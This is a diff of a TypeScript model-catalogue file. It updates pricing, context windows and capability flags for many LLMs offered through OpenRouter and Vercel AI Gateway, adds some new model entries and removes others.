"minimax/minimax-m2.7": { + id: "minimax/minimax-m2.7", + name: "MiniMax: MiniMax M2.7", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0.3, + output: 1.2, + cacheRead: 0.06, + cacheWrite: 0, + }, + contextWindow: 204800, + maxTokens: 131072, + } satisfies Model<"openai-completions">, "mistralai/codestral-2508": { id: "mistralai/codestral-2508", name: "Mistral: Codestral 2508", @@ -7856,7 +7838,7 @@ export const MODELS = { cost: { input: 0.3, output: 0.8999999999999999, - cacheRead: 0, + cacheRead: 0.03, cacheWrite: 0, }, contextWindow: 256000, @@ -7873,7 +7855,7 @@ export const MODELS = { cost: { input: 0.39999999999999997, output: 2, - cacheRead: 0, + cacheRead: 0.04, cacheWrite: 0, }, contextWindow: 262144, @@ -7890,7 +7872,7 @@ export const MODELS = { cost: { input: 0.39999999999999997, output: 2, - cacheRead: 0, + cacheRead: 0.04, cacheWrite: 0, }, contextWindow: 131072, @@ -7907,7 +7889,7 @@ export const MODELS = { cost: { input: 0.09999999999999999, output: 0.3, - cacheRead: 0, + cacheRead: 0.01, cacheWrite: 0, }, contextWindow: 131072, @@ -7924,7 +7906,7 @@ export const MODELS = { cost: { input: 0.19999999999999998, output: 0.19999999999999998, - cacheRead: 0, + cacheRead: 0.02, cacheWrite: 0, }, contextWindow: 262144, @@ -7941,7 +7923,7 @@ export const MODELS = { cost: { input: 0.09999999999999999, output: 0.09999999999999999, - cacheRead: 0, + cacheRead: 0.01, cacheWrite: 0, }, contextWindow: 131072, @@ -7958,7 +7940,7 @@ export const MODELS = { cost: { input: 0.15, output: 0.15, - cacheRead: 0, + cacheRead: 0.015, cacheWrite: 0, }, contextWindow: 262144, @@ -7975,7 +7957,7 @@ export const MODELS = { cost: { input: 2, output: 6, - cacheRead: 0, + cacheRead: 0.19999999999999998, cacheWrite: 0, }, contextWindow: 128000, @@ -7992,7 +7974,7 @@ export const MODELS = { cost: { input: 2, output: 6, - cacheRead: 0, + cacheRead: 0.19999999999999998, 
cacheWrite: 0, }, contextWindow: 131072, @@ -8009,7 +7991,7 @@ export const MODELS = { cost: { input: 2, output: 6, - cacheRead: 0, + cacheRead: 0.19999999999999998, cacheWrite: 0, }, contextWindow: 131072, @@ -8026,7 +8008,7 @@ export const MODELS = { cost: { input: 0.5, output: 1.5, - cacheRead: 0, + cacheRead: 0.049999999999999996, cacheWrite: 0, }, contextWindow: 262144, @@ -8043,7 +8025,7 @@ export const MODELS = { cost: { input: 0.39999999999999997, output: 2, - cacheRead: 0, + cacheRead: 0.04, cacheWrite: 0, }, contextWindow: 131072, @@ -8060,7 +8042,7 @@ export const MODELS = { cost: { input: 0.39999999999999997, output: 2, - cacheRead: 0, + cacheRead: 0.04, cacheWrite: 0, }, contextWindow: 131072, @@ -8094,7 +8076,7 @@ export const MODELS = { cost: { input: 0.19999999999999998, output: 0.6, - cacheRead: 0, + cacheRead: 0.02, cacheWrite: 0, }, contextWindow: 32768, @@ -8117,6 +8099,23 @@ export const MODELS = { contextWindow: 32768, maxTokens: 16384, } satisfies Model<"openai-completions">, + "mistralai/mistral-small-2603": { + id: "mistralai/mistral-small-2603", + name: "Mistral: Mistral Small 4", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.15, + output: 0.6, + cacheRead: 0.015, + cacheWrite: 0, + }, + contextWindow: 262144, + maxTokens: 4096, + } satisfies Model<"openai-completions">, "mistralai/mistral-small-3.1-24b-instruct:free": { id: "mistralai/mistral-small-3.1-24b-instruct:free", name: "Mistral: Mistral Small 3.1 24B (free)", @@ -8143,13 +8142,13 @@ export const MODELS = { reasoning: false, input: ["text", "image"], cost: { - input: 0.06, - output: 0.18, - cacheRead: 0.03, + input: 0.075, + output: 0.19999999999999998, + cacheRead: 0, cacheWrite: 0, }, - contextWindow: 131072, - maxTokens: 131072, + contextWindow: 128000, + maxTokens: 4096, } satisfies Model<"openai-completions">, "mistralai/mistral-small-creative": { id: 
"mistralai/mistral-small-creative", @@ -8162,7 +8161,7 @@ export const MODELS = { cost: { input: 0.09999999999999999, output: 0.3, - cacheRead: 0, + cacheRead: 0.01, cacheWrite: 0, }, contextWindow: 32768, @@ -8179,7 +8178,7 @@ export const MODELS = { cost: { input: 2, output: 6, - cacheRead: 0, + cacheRead: 0.19999999999999998, cacheWrite: 0, }, contextWindow: 65536, @@ -8213,7 +8212,7 @@ export const MODELS = { cost: { input: 2, output: 6, - cacheRead: 0, + cacheRead: 0.19999999999999998, cacheWrite: 0, }, contextWindow: 131072, @@ -8230,7 +8229,7 @@ export const MODELS = { cost: { input: 0.09999999999999999, output: 0.3, - cacheRead: 0, + cacheRead: 0.01, cacheWrite: 0, }, contextWindow: 32000, @@ -8270,23 +8269,6 @@ export const MODELS = { contextWindow: 131072, maxTokens: 4096, } satisfies Model<"openai-completions">, - "moonshotai/kimi-k2-0905:exacto": { - id: "moonshotai/kimi-k2-0905:exacto", - name: "MoonshotAI: Kimi K2 0905 (exacto)", - api: "openai-completions", - provider: "openrouter", - baseUrl: "https://openrouter.ai/api/v1", - reasoning: false, - input: ["text"], - cost: { - input: 0.6, - output: 2.5, - cacheRead: 0, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 4096, - } satisfies Model<"openai-completions">, "moonshotai/kimi-k2-thinking": { id: "moonshotai/kimi-k2-thinking", name: "MoonshotAI: Kimi K2 Thinking", @@ -8406,6 +8388,40 @@ export const MODELS = { contextWindow: 256000, maxTokens: 4096, } satisfies Model<"openai-completions">, + "nvidia/nemotron-3-super-120b-a12b": { + id: "nvidia/nemotron-3-super-120b-a12b", + name: "NVIDIA: Nemotron 3 Super", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0.09999999999999999, + output: 0.5, + cacheRead: 0.04, + cacheWrite: 0, + }, + contextWindow: 262144, + maxTokens: 4096, + } satisfies Model<"openai-completions">, + "nvidia/nemotron-3-super-120b-a12b:free": { + id: 
"nvidia/nemotron-3-super-120b-a12b:free", + name: "NVIDIA: Nemotron 3 Super (free)", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 262144, + maxTokens: 262144, + } satisfies Model<"openai-completions">, "nvidia/nemotron-nano-12b-v2-vl:free": { id: "nvidia/nemotron-nano-12b-v2-vl:free", name: "NVIDIA: Nemotron Nano 12B 2 VL (free)", @@ -9103,6 +9119,40 @@ export const MODELS = { contextWindow: 1050000, maxTokens: 128000, } satisfies Model<"openai-completions">, + "openai/gpt-5.4-mini": { + id: "openai/gpt-5.4-mini", + name: "OpenAI: GPT-5.4 Mini", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.75, + output: 4.5, + cacheRead: 0.075, + cacheWrite: 0, + }, + contextWindow: 400000, + maxTokens: 128000, + } satisfies Model<"openai-completions">, + "openai/gpt-5.4-nano": { + id: "openai/gpt-5.4-nano", + name: "OpenAI: GPT-5.4 Nano", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.19999999999999998, + output: 1.25, + cacheRead: 0.02, + cacheWrite: 0, + }, + contextWindow: 400000, + maxTokens: 128000, + } satisfies Model<"openai-completions">, "openai/gpt-5.4-pro": { id: "openai/gpt-5.4-pro", name: "OpenAI: GPT-5.4 Pro", @@ -9137,23 +9187,6 @@ export const MODELS = { contextWindow: 131072, maxTokens: 4096, } satisfies Model<"openai-completions">, - "openai/gpt-oss-120b:exacto": { - id: "openai/gpt-oss-120b:exacto", - name: "OpenAI: gpt-oss-120b (exacto)", - api: "openai-completions", - provider: "openrouter", - baseUrl: "https://openrouter.ai/api/v1", - reasoning: true, - input: ["text"], - cost: { - input: 0.039, - output: 0.19, - cacheRead: 0, - cacheWrite: 0, - 
}, - contextWindow: 131072, - maxTokens: 4096, - } satisfies Model<"openai-completions">, "openai/gpt-oss-120b:free": { id: "openai/gpt-oss-120b:free", name: "OpenAI: gpt-oss-120b (free)", @@ -9181,12 +9214,12 @@ export const MODELS = { input: ["text"], cost: { input: 0.03, - output: 0.14, - cacheRead: 0, + output: 0.11, + cacheRead: 0.015, cacheWrite: 0, }, contextWindow: 131072, - maxTokens: 4096, + maxTokens: 131072, } satisfies Model<"openai-completions">, "openai/gpt-oss-20b:free": { id: "openai/gpt-oss-20b:free", @@ -9228,7 +9261,7 @@ export const MODELS = { api: "openai-completions", provider: "openrouter", baseUrl: "https://openrouter.ai/api/v1", - reasoning: false, + reasoning: true, input: ["text", "image"], cost: { input: 15, @@ -9279,7 +9312,7 @@ export const MODELS = { api: "openai-completions", provider: "openrouter", baseUrl: "https://openrouter.ai/api/v1", - reasoning: false, + reasoning: true, input: ["text"], cost: { input: 1.1, @@ -9296,7 +9329,7 @@ export const MODELS = { api: "openai-completions", provider: "openrouter", baseUrl: "https://openrouter.ai/api/v1", - reasoning: false, + reasoning: true, input: ["text"], cost: { input: 1.1, @@ -9486,9 +9519,9 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 0.39999999999999997, - output: 1.2, - cacheRead: 0.08, + input: 0.26, + output: 0.78, + cacheRead: 0.052000000000000005, cacheWrite: 0, }, contextWindow: 1000000, @@ -9554,8 +9587,8 @@ export const MODELS = { reasoning: false, input: ["text", "image"], cost: { - input: 0.7999999999999999, - output: 3.1999999999999997, + input: 0.52, + output: 2.08, cacheRead: 0, cacheWrite: 0, }, @@ -9622,13 +9655,13 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.11, - output: 0.6, - cacheRead: 0.055, + input: 0.14950000000000002, + output: 1.495, + cacheRead: 0, cacheWrite: 0, }, - contextWindow: 262144, - maxTokens: 262144, + contextWindow: 131072, + maxTokens: 4096, } satisfies 
Model<"openai-completions">, "qwen/qwen3-30b-a3b": { id: "qwen/qwen3-30b-a3b", @@ -9673,13 +9706,13 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.051, - output: 0.33999999999999997, - cacheRead: 0, + input: 0.08, + output: 0.39999999999999997, + cacheRead: 0.08, cacheWrite: 0, }, - contextWindow: 32768, - maxTokens: 4096, + contextWindow: 131072, + maxTokens: 131072, } satisfies Model<"openai-completions">, "qwen/qwen3-32b": { id: "qwen/qwen3-32b", @@ -9817,23 +9850,6 @@ export const MODELS = { contextWindow: 1000000, maxTokens: 65536, } satisfies Model<"openai-completions">, - "qwen/qwen3-coder:exacto": { - id: "qwen/qwen3-coder:exacto", - name: "Qwen: Qwen3 Coder 480B A35B (exacto)", - api: "openai-completions", - provider: "openrouter", - baseUrl: "https://openrouter.ai/api/v1", - reasoning: false, - input: ["text"], - cost: { - input: 0.22, - output: 1.7999999999999998, - cacheRead: 0.022, - cacheWrite: 0, - }, - contextWindow: 262144, - maxTokens: 65536, - } satisfies Model<"openai-completions">, "qwen/qwen3-coder:free": { id: "qwen/qwen3-coder:free", name: "Qwen: Qwen3 Coder 480B A35B (free)", @@ -9860,9 +9876,9 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 1.2, - output: 6, - cacheRead: 0.24, + input: 0.78, + output: 3.9, + cacheRead: 0.156, cacheWrite: 0, }, contextWindow: 262144, @@ -9928,13 +9944,13 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.15, - output: 1.2, + input: 0.0975, + output: 0.78, cacheRead: 0, cacheWrite: 0, }, - contextWindow: 128000, - maxTokens: 4096, + contextWindow: 131072, + maxTokens: 32768, } satisfies Model<"openai-completions">, "qwen/qwen3-vl-235b-a22b-instruct": { id: "qwen/qwen3-vl-235b-a22b-instruct", @@ -9962,8 +9978,8 @@ export const MODELS = { reasoning: true, input: ["text", "image"], cost: { - input: 0, - output: 0, + input: 0.26, + output: 2.6, cacheRead: 0, cacheWrite: 0, }, @@ -9996,8 +10012,8 @@ export const MODELS = 
{ reasoning: true, input: ["text", "image"], cost: { - input: 0, - output: 0, + input: 0.13, + output: 1.56, cacheRead: 0, cacheWrite: 0, }, @@ -10123,6 +10139,23 @@ export const MODELS = { contextWindow: 262144, maxTokens: 65536, } satisfies Model<"openai-completions">, + "qwen/qwen3.5-9b": { + id: "qwen/qwen3.5-9b", + name: "Qwen: Qwen3.5-9B", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.049999999999999996, + output: 0.15, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 256000, + maxTokens: 4096, + } satisfies Model<"openai-completions">, "qwen/qwen3.5-flash-02-23": { id: "qwen/qwen3.5-flash-02-23", name: "Qwen: Qwen3.5-Flash", @@ -10132,8 +10165,8 @@ export const MODELS = { reasoning: true, input: ["text", "image"], cost: { - input: 0.09999999999999999, - output: 0.39999999999999997, + input: 0.065, + output: 0.26, cacheRead: 0, cacheWrite: 0, }, @@ -10167,12 +10200,12 @@ export const MODELS = { input: ["text"], cost: { input: 0.15, - output: 0.39999999999999997, + output: 0.58, cacheRead: 0, cacheWrite: 0, }, - contextWindow: 32768, - maxTokens: 32768, + contextWindow: 131072, + maxTokens: 131072, } satisfies Model<"openai-completions">, "relace/relace-search": { id: "relace/relace-search", @@ -10217,13 +10250,13 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 0.65, - output: 0.75, + input: 0.85, + output: 0.85, cacheRead: 0, cacheWrite: 0, }, - contextWindow: 32768, - maxTokens: 32768, + contextWindow: 131072, + maxTokens: 16384, } satisfies Model<"openai-completions">, "stepfun/step-3.5-flash": { id: "stepfun/step-3.5-flash", @@ -10302,9 +10335,9 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.25, - output: 0.85, - cacheRead: 0.125, + input: 0.3, + output: 1.1, + cacheRead: 0.15, cacheWrite: 0, }, contextWindow: 163840, @@ -10446,6 +10479,23 @@ export const MODELS = { 
contextWindow: 2000000, maxTokens: 30000, } satisfies Model<"openai-completions">, + "x-ai/grok-4.20-beta": { + id: "x-ai/grok-4.20-beta", + name: "xAI: Grok 4.20 Beta", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 2, + output: 6, + cacheRead: 0.19999999999999998, + cacheWrite: 0, + }, + contextWindow: 2000000, + maxTokens: 4096, + } satisfies Model<"openai-completions">, "x-ai/grok-code-fast-1": { id: "x-ai/grok-code-fast-1", name: "xAI: Grok Code Fast 1", @@ -10480,6 +10530,40 @@ export const MODELS = { contextWindow: 262144, maxTokens: 65536, } satisfies Model<"openai-completions">, + "xiaomi/mimo-v2-omni": { + id: "xiaomi/mimo-v2-omni", + name: "Xiaomi: MiMo-V2-Omni", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.39999999999999997, + output: 2, + cacheRead: 0.08, + cacheWrite: 0, + }, + contextWindow: 262144, + maxTokens: 65536, + } satisfies Model<"openai-completions">, + "xiaomi/mimo-v2-pro": { + id: "xiaomi/mimo-v2-pro", + name: "Xiaomi: MiMo-V2-Pro", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text"], + cost: { + input: 1, + output: 3, + cacheRead: 0.19999999999999998, + cacheWrite: 0, + }, + contextWindow: 1048576, + maxTokens: 131072, + } satisfies Model<"openai-completions">, "z-ai/glm-4-32b": { id: "z-ai/glm-4-32b", name: "Z.ai: GLM 4 32B ", @@ -10582,23 +10666,6 @@ export const MODELS = { contextWindow: 204800, maxTokens: 204800, } satisfies Model<"openai-completions">, - "z-ai/glm-4.6:exacto": { - id: "z-ai/glm-4.6:exacto", - name: "Z.ai: GLM 4.6 (exacto)", - api: "openai-completions", - provider: "openrouter", - baseUrl: "https://openrouter.ai/api/v1", - reasoning: true, - input: ["text"], - cost: { - input: 0.44, - output: 1.76, - 
cacheRead: 0.11, - cacheWrite: 0, - }, - contextWindow: 204800, - maxTokens: 131072, - } satisfies Model<"openai-completions">, "z-ai/glm-4.6v": { id: "z-ai/glm-4.6v", name: "Z.ai: GLM 4.6V", @@ -10625,13 +10692,13 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.38, - output: 1.9800000000000002, - cacheRead: 0.19, + input: 0.39, + output: 1.75, + cacheRead: 0.195, cacheWrite: 0, }, contextWindow: 202752, - maxTokens: 4096, + maxTokens: 65535, } satisfies Model<"openai-completions">, "z-ai/glm-4.7-flash": { id: "z-ai/glm-4.7-flash", @@ -10664,8 +10731,25 @@ export const MODELS = { cacheRead: 0.119, cacheWrite: 0, }, + contextWindow: 80000, + maxTokens: 131072, + } satisfies Model<"openai-completions">, + "z-ai/glm-5-turbo": { + id: "z-ai/glm-5-turbo", + name: "Z.ai: GLM 5 Turbo", + api: "openai-completions", + provider: "openrouter", + baseUrl: "https://openrouter.ai/api/v1", + reasoning: true, + input: ["text"], + cost: { + input: 0.96, + output: 3.1999999999999997, + cacheRead: 0.192, + cacheWrite: 0, + }, contextWindow: 202752, - maxTokens: 4096, + maxTokens: 131072, } satisfies Model<"openai-completions">, }, "vercel-ai-gateway": { @@ -10678,7 +10762,7 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.06, + input: 0.12, output: 0.24, cacheRead: 0, cacheWrite: 0, @@ -10729,13 +10813,13 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.09999999999999999, - output: 0.3, - cacheRead: 0, + input: 0.29, + output: 0.59, + cacheRead: 0.145, cacheWrite: 0, }, - contextWindow: 40960, - maxTokens: 16384, + contextWindow: 131072, + maxTokens: 40960, } satisfies Model<"anthropic-messages">, "alibaba/qwen3-235b-a22b-thinking": { id: "alibaba/qwen3-235b-a22b-thinking", @@ -10746,9 +10830,9 @@ export const MODELS = { reasoning: true, input: ["text", "image"], cost: { - input: 0.3, - output: 2.9000000000000004, - cacheRead: 0, + input: 0.22999999999999998, + output: 2.3, + cacheRead: 
0.19999999999999998, cacheWrite: 0, }, contextWindow: 262114, @@ -10765,7 +10849,7 @@ export const MODELS = { cost: { input: 0.39999999999999997, output: 1.5999999999999999, - cacheRead: 0, + cacheRead: 0.022, cacheWrite: 0, }, contextWindow: 262144, @@ -10780,13 +10864,13 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.07, - output: 0.27, + input: 0.15, + output: 0.6, cacheRead: 0, cacheWrite: 0, }, - contextWindow: 160000, - maxTokens: 32768, + contextWindow: 262144, + maxTokens: 8192, } satisfies Model<"anthropic-messages">, "alibaba/qwen3-coder-next": { id: "alibaba/qwen3-coder-next", @@ -10794,7 +10878,7 @@ export const MODELS = { api: "anthropic-messages", provider: "vercel-ai-gateway", baseUrl: "https://ai-gateway.vercel.sh", - reasoning: true, + reasoning: false, input: ["text"], cost: { input: 0.5, @@ -10822,6 +10906,23 @@ export const MODELS = { contextWindow: 1000000, maxTokens: 65536, } satisfies Model<"anthropic-messages">, + "alibaba/qwen3-max": { + id: "alibaba/qwen3-max", + name: "Qwen3 Max", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: false, + input: ["text"], + cost: { + input: 1.2, + output: 6, + cacheRead: 0.24, + cacheWrite: 0, + }, + contextWindow: 262144, + maxTokens: 32768, + } satisfies Model<"anthropic-messages">, "alibaba/qwen3-max-preview": { id: "alibaba/qwen3-max-preview", name: "Qwen3 Max Preview", @@ -10969,8 +11070,8 @@ export const MODELS = { cost: { input: 3, output: 15, - cacheRead: 0, - cacheWrite: 0, + cacheRead: 0.3, + cacheWrite: 3.75, }, contextWindow: 200000, maxTokens: 8192, @@ -11179,6 +11280,23 @@ export const MODELS = { contextWindow: 256000, maxTokens: 8000, } satisfies Model<"anthropic-messages">, + "deepseek/deepseek-r1": { + id: "deepseek/deepseek-r1", + name: "DeepSeek-R1", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: true, + input: 
["text"], + cost: { + input: 1.35, + output: 5.4, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 128000, + maxTokens: 8192, + } satisfies Model<"anthropic-messages">, "deepseek/deepseek-v3": { id: "deepseek/deepseek-v3", name: "DeepSeek V3 0324", @@ -11205,13 +11323,13 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.21, - output: 0.7899999999999999, + input: 0.5, + output: 1.5, cacheRead: 0, cacheWrite: 0, }, contextWindow: 163840, - maxTokens: 128000, + maxTokens: 16384, } satisfies Model<"anthropic-messages">, "deepseek/deepseek-v3.1-terminus": { id: "deepseek/deepseek-v3.1-terminus", @@ -11224,7 +11342,7 @@ export const MODELS = { cost: { input: 0.27, output: 1, - cacheRead: 0, + cacheRead: 0.135, cacheWrite: 0, }, contextWindow: 131072, @@ -11239,9 +11357,9 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 0.26, - output: 0.38, - cacheRead: 0.13, + input: 0.28, + output: 0.42, + cacheRead: 0.028, cacheWrite: 0, }, contextWindow: 128000, @@ -11264,6 +11382,40 @@ export const MODELS = { contextWindow: 128000, maxTokens: 64000, } satisfies Model<"anthropic-messages">, + "google/gemini-2.0-flash": { + id: "google/gemini-2.0-flash", + name: "Gemini 2.0 Flash", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: false, + input: ["text", "image"], + cost: { + input: 0.15, + output: 0.6, + cacheRead: 0.024999999999999998, + cacheWrite: 0, + }, + contextWindow: 1048576, + maxTokens: 8192, + } satisfies Model<"anthropic-messages">, + "google/gemini-2.0-flash-lite": { + id: "google/gemini-2.0-flash-lite", + name: "Gemini 2.0 Flash Lite", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: false, + input: ["text", "image"], + cost: { + input: 0.075, + output: 0.3, + cacheRead: 0.02, + cacheWrite: 0, + }, + contextWindow: 1048576, + maxTokens: 8192, + } satisfies 
Model<"anthropic-messages">, "google/gemini-2.5-flash": { id: "google/gemini-2.5-flash", name: "Gemini 2.5 Flash", @@ -11271,11 +11423,11 @@ export const MODELS = { provider: "vercel-ai-gateway", baseUrl: "https://ai-gateway.vercel.sh", reasoning: true, - input: ["text"], + input: ["text", "image"], cost: { input: 0.3, output: 2.5, - cacheRead: 0, + cacheRead: 0.03, cacheWrite: 0, }, contextWindow: 1000000, @@ -11298,40 +11450,6 @@ export const MODELS = { contextWindow: 1048576, maxTokens: 65536, } satisfies Model<"anthropic-messages">, - "google/gemini-2.5-flash-lite-preview-09-2025": { - id: "google/gemini-2.5-flash-lite-preview-09-2025", - name: "Gemini 2.5 Flash Lite Preview 09-2025", - api: "anthropic-messages", - provider: "vercel-ai-gateway", - baseUrl: "https://ai-gateway.vercel.sh", - reasoning: true, - input: ["text", "image"], - cost: { - input: 0.09999999999999999, - output: 0.39999999999999997, - cacheRead: 0.01, - cacheWrite: 0, - }, - contextWindow: 1048576, - maxTokens: 65536, - } satisfies Model<"anthropic-messages">, - "google/gemini-2.5-flash-preview-09-2025": { - id: "google/gemini-2.5-flash-preview-09-2025", - name: "Gemini 2.5 Flash Preview 09-2025", - api: "anthropic-messages", - provider: "vercel-ai-gateway", - baseUrl: "https://ai-gateway.vercel.sh", - reasoning: true, - input: ["text", "image"], - cost: { - input: 0.3, - output: 2.5, - cacheRead: 0.03, - cacheWrite: 0, - }, - contextWindow: 1000000, - maxTokens: 65536, - } satisfies Model<"anthropic-messages">, "google/gemini-2.5-pro": { id: "google/gemini-2.5-pro", name: "Gemini 2.5 Pro", @@ -11339,11 +11457,11 @@ export const MODELS = { provider: "vercel-ai-gateway", baseUrl: "https://ai-gateway.vercel.sh", reasoning: true, - input: ["text"], + input: ["text", "image"], cost: { input: 1.25, output: 10, - cacheRead: 0, + cacheRead: 0.125, cacheWrite: 0, }, contextWindow: 1048576, @@ -11364,7 +11482,7 @@ export const MODELS = { cacheWrite: 0, }, contextWindow: 1000000, - maxTokens: 64000, 
+ maxTokens: 65000, } satisfies Model<"anthropic-messages">, "google/gemini-3-pro-preview": { id: "google/gemini-3-pro-preview", @@ -11466,7 +11584,7 @@ export const MODELS = { cacheWrite: 0, }, contextWindow: 128000, - maxTokens: 8192, + maxTokens: 100000, } satisfies Model<"anthropic-messages">, "meituan/longcat-flash-thinking": { id: "meituan/longcat-flash-thinking", @@ -11494,13 +11612,13 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 0.39999999999999997, - output: 0.39999999999999997, + input: 0.72, + output: 0.72, cacheRead: 0, cacheWrite: 0, }, - contextWindow: 131072, - maxTokens: 16384, + contextWindow: 128000, + maxTokens: 8192, } satisfies Model<"anthropic-messages">, "meta/llama-3.1-8b": { id: "meta/llama-3.1-8b", @@ -11511,12 +11629,12 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 0.03, - output: 0.049999999999999996, - cacheRead: 0, + input: 0.09999999999999999, + output: 0.09999999999999999, + cacheRead: 0.09999999999999999, cacheWrite: 0, }, - contextWindow: 131072, + contextWindow: 128000, maxTokens: 16384, } satisfies Model<"anthropic-messages">, "meta/llama-3.2-11b": { @@ -11579,12 +11697,12 @@ export const MODELS = { reasoning: false, input: ["text", "image"], cost: { - input: 0.15, - output: 0.6, + input: 0.24, + output: 0.9700000000000001, cacheRead: 0, cacheWrite: 0, }, - contextWindow: 131072, + contextWindow: 128000, maxTokens: 8192, } satisfies Model<"anthropic-messages">, "meta/llama-4-scout": { @@ -11596,12 +11714,12 @@ export const MODELS = { reasoning: false, input: ["text", "image"], cost: { - input: 0.08, - output: 0.3, + input: 0.16999999999999998, + output: 0.66, cacheRead: 0, cacheWrite: 0, }, - contextWindow: 131072, + contextWindow: 128000, maxTokens: 8192, } satisfies Model<"anthropic-messages">, "minimax/minimax-m2": { @@ -11632,8 +11750,8 @@ export const MODELS = { cost: { input: 0.3, output: 1.2, - cacheRead: 0.15, - cacheWrite: 0, + cacheRead: 0.03, + 
cacheWrite: 0.375, }, contextWindow: 204800, maxTokens: 131072, @@ -11686,8 +11804,42 @@ export const MODELS = { cacheRead: 0.03, cacheWrite: 0.375, }, - contextWindow: 4096, - maxTokens: 4096, + contextWindow: 204800, + maxTokens: 131000, + } satisfies Model<"anthropic-messages">, + "minimax/minimax-m2.7": { + id: "minimax/minimax-m2.7", + name: "Minimax M2.7", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.3, + output: 1.2, + cacheRead: 0.06, + cacheWrite: 0.375, + }, + contextWindow: 204800, + maxTokens: 131000, + } satisfies Model<"anthropic-messages">, + "minimax/minimax-m2.7-highspeed": { + id: "minimax/minimax-m2.7-highspeed", + name: "MiniMax M2.7 High Speed", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0.6, + output: 2.4, + cacheRead: 0.06, + cacheWrite: 0.375, + }, + contextWindow: 204800, + maxTokens: 131100, } satisfies Model<"anthropic-messages">, "mistral/codestral": { id: "mistral/codestral", @@ -11715,8 +11867,8 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 0, - output: 0, + input: 0.39999999999999997, + output: 2, cacheRead: 0, cacheWrite: 0, }, @@ -11749,8 +11901,8 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 0, - output: 0, + input: 0.09999999999999999, + output: 0.3, cacheRead: 0, cacheWrite: 0, }, @@ -11766,8 +11918,8 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 0.04, - output: 0.04, + input: 0.09999999999999999, + output: 0.09999999999999999, cacheRead: 0, cacheWrite: 0, }, @@ -11783,8 +11935,8 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 0.09999999999999999, - output: 0.09999999999999999, + input: 0.15, + output: 0.15, cacheRead: 0, cacheWrite: 0, }, @@ 
-11868,14 +12020,31 @@ export const MODELS = { reasoning: false, input: ["text"], cost: { - input: 0.5, - output: 2, - cacheRead: 0, + input: 0.6, + output: 2.5, + cacheRead: 0.15, cacheWrite: 0, }, contextWindow: 131072, maxTokens: 16384, } satisfies Model<"anthropic-messages">, + "moonshotai/kimi-k2-0905": { + id: "moonshotai/kimi-k2-0905", + name: "Kimi K2 0905", + api: "anthropic-messages", + provider: "vercel-ai-gateway", + baseUrl: "https://ai-gateway.vercel.sh", + reasoning: false, + input: ["text"], + cost: { + input: 0.6, + output: 2.5, + cacheRead: 0.15, + cacheWrite: 0, + }, + contextWindow: 256000, + maxTokens: 16384, + } satisfies Model<"anthropic-messages">, "moonshotai/kimi-k2-thinking": { id: "moonshotai/kimi-k2-thinking", name: "Kimi K2 Thinking", @@ -11885,13 +12054,13 @@ export const MODELS = { reasoning: true, input: ["text"], cost: { - input: 0.47, - output: 2, - cacheRead: 0.14100000000000001, + input: 0.6, + output: 2.5, + cacheRead: 0.15, cacheWrite: 0, }, - contextWindow: 216144, - maxTokens: 216144, + contextWindow: 262114, + maxTokens: 262114, } satisfies Model<"anthropic-messages">, "moonshotai/kimi-k2-thinking-turbo": { id: 